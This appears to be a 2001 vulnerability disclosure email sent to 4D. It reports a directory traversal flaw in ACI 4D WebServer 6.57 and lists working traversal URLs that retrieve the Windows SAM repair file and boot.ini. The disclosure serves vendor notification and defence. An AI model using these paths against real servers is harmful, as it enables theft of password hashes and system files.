ACI 4D WebServer Directory traversal.

[KRFinisterre () checkfree com]

----- Forwarded by Kevin R Finisterre/OH/CheckFree on 08/20/2001 10:43 AM
-----
                                                                                                                        
        
                    KF <dotslash () snosoft com>                                                                        
           
                    Sent by:                          To:     sales () 4D com, recon () snosoft com                     
              
                    elguapo@clmboh1-smtp3.colum       cc:                                                               
        
                    bus.rr.com                        Subject:     I have found a security hole in your product...      
        
                                                                                                                        
        
                                                                                                                        
        
                    08/18/2001 09:39 PM                                                                                 
        
                                                                                                                        
        
                                                                                                                        
        




vendor: http://www.4d.com/
current version: 6.7
tested version: 6.57 , others?

This directory transversal hole seems to work on
ACI 4d webserver running on the NT platform. I would imagine
exploitation on a macos box would be similar but would require
the proper mac filesystem path to the file you wish to view.

Server: ACI-4D/6.57

Http://host + one of the following urls.

/4DBin/_/C:/winnt/repair/sam._
/4DBin/_/../winnt/repair/sam._
/4DBin/_/C:/inetpub/../boot.ini
/4DBin/_/../boot.ini
/4DBin/_/../inetpub/../boot.ini

-KF